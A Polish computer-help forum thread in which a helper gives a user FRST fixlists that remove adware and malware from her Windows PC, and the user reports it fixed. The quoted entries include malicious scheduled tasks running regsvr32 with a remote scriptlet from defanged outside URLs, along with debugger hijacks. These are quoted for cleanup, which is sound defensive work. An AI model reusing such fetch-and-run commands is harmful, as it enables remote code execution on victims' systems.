Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Luckystarting - logi FRST

Agnesik 04 Maj 2017 20:42 546 8
  • #2 04 Maj 2017 20:57
    Kolobos
    Spec od komputerów

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA
    CustomCLSID: HKU\S-1-5-21-3315310686-3322874680-1150652724-1003_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Agnieszka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
    Task: {16C75675-3534-434A-B87A-99321E5F19B6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88FUI8F8RWNYEdOTM4OWzLOUY1NWNSMdkyM8NLM8U4RF== scrobj.dll
    Task: {1A94F0C9-8829-4A78-9D0C-1E09763DA2CF} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {41FF5A8E-0588-455A-94AB-D36CF907DBE8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88FUI8F8RWNYEdOTM4OWzLOUY1NWNSMdkyM8NLM8U4RF== scrobj.dll
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Run: [background_fault] => "C:\Users\Agnieszka\AppData\Local\background_fault\aswRD.exe" "C:\Users\Agnieszka\AppData\Local\background_fault\bf.dll",background_fault_collector <===== UWAGA
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Policies\system: [WallpaperStyle] 2
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\Policies\Explorer: [HideSCAHealth] 1
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [SharingPrivate] -> {08244EE6-92F0-47f2-9FC9-929BAA2E7235} => -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [SharingPrivate] -> {08244EE6-92F0-47f2-9FC9-929BAA2E7235} => -> Brak pliku
    SearchScopes: HKLM -> DefaultScope - brak wartości
    SearchScopes: HKLM -> {F2996606-D7EC-4034-8FE9-272397BA49EE} URL = hxxp://slirsredirect.search.aol.com/slirs_http/sredir?sredir=1602&query={searchTerms}&invocationType=tb50hpcnnbie7-pl-pl
    SearchScopes: HKLM-x32 -> {F2996606-D7EC-4034-8FE9-272397BA49EE} URL = hxxp://slirsredirect.search.aol.com/slirs_http/sredir?sredir=1602&query={searchTerms}&invocationType=tb50hpcnnbie7-pl-pl
    SearchScopes: HKU\S-1-5-21-3315310686-3322874680-1150652724-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    FF Extension: (Aktualizacja dodatku Adobe Flash) - C:\Users\Agnieszka\AppData\Roaming\Mozilla\Firefox\Profiles\namn8oyt.default\Extensions\dodatek@flash2.pl.xpi [2016-08-05]
    HKU\S-1-5-21-3315310686-3322874680-1150652724-1003\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA
    S2 FirefoxDL; "C:\Users\AGNIES~1\AppData\Local\Temp\1\QQBrowser.exe" -isvc [X] <==== UWAGA




    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [X] <==== UWAGA
    R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-04-20] (Zemana Ltd.)
    S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
    2017-05-04 19:12 - 2017-05-04 19:12 - 00012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
    2017-05-04 18:22 - 2017-05-04 18:22 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\Zoohair
    2017-05-04 18:19 - 2017-05-04 18:19 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-04 18:18 - 2017-05-04 18:18 - 00000000 ____D C:\Program Files (x86)\Zoohair
    2017-05-04 10:34 - 2017-05-04 10:47 - 00000000 ____D C:\ProgramData\HitmanPro
    2017-05-04 08:07 - 2017-05-04 08:07 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\Google
    2017-05-03 17:49 - 2017-05-04 18:17 - 00003600 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-03 17:49 - 2017-05-04 15:49 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-03 17:49 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-05-03 17:49 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-04-26 16:23 - 2017-05-04 20:28 - 00014482 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
    2017-04-26 16:23 - 2017-05-04 20:25 - 00100319 _____ C:\WINDOWS\ZAM.krnl.trace
    2017-04-26 15:01 - 2017-04-26 15:01 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-20 17:21 - 2017-05-04 20:27 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
    2017-04-20 17:21 - 2017-04-20 17:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
    2017-04-20 17:21 - 2017-04-20 17:21 - 00000000 ____D C:\Users\Agnieszka\AppData\Local\Zemana
    2017-04-20 17:16 - 2017-05-03 18:06 - 00000000 ____D C:\Users\Agnieszka\AppData\LocalLow\Mozilla
    2017-04-20 17:10 - 2017-05-04 18:52 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-20 17:10 - 2017-05-04 18:22 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-20 17:10 - 2017-05-03 17:49 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 17:10 - 2017-05-02 14:59 - 00000000 _____ C:\WINDOWS\SysWOW64\44
    2017-04-20 17:10 - 2017-04-20 17:10 - 00000000 ____D C:\Program Files (x86)\Everbean
    2017-04-20 17:05 - 2017-04-26 15:00 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-13 15:00 - 2017-04-13 15:01 - 00003696 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 14:59 - 2017-04-13 14:59 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\SSMgre
    2017-04-10 10:30 - 2017-04-13 15:01 - 00003674 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-26 16:24 - 2016-09-02 12:21 - 00000000 ____D C:\ProgramData\McAfee
    2013-01-31 17:10 - 2013-01-31 17:10 - 0000110 _____ () C:\Users\Agnieszka\AppData\Roaming\wklnhst.dat
    EmptyTemp:

    W FRST wybierz Napraw.

    0
  • #4 04 Maj 2017 22:24
    Kolobos
    Spec od komputerów

    Wykonaj jeszcze taki Fixlist.txt dla FRST:
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    2017-04-26 16:23 - 2017-05-04 21:25 - 00000855 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
    2017-04-13 14:59 - 2017-03-30 12:39 - 00000000 ____D C:\Users\Agnieszka\AppData\Roaming\ScreenShot

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #6 04 Maj 2017 23:01
    Kolobos
    Spec od komputerów

    W ktorej przegladarce?

    0
  • #7 04 Maj 2017 23:11
    Agnesik
    Poziom 3  

    Google Chrom

    0
  • #9 07 Maj 2017 22:52
    Agnesik
    Poziom 3  

    Wygląda na to, że jest ok. Dziękuję.

    0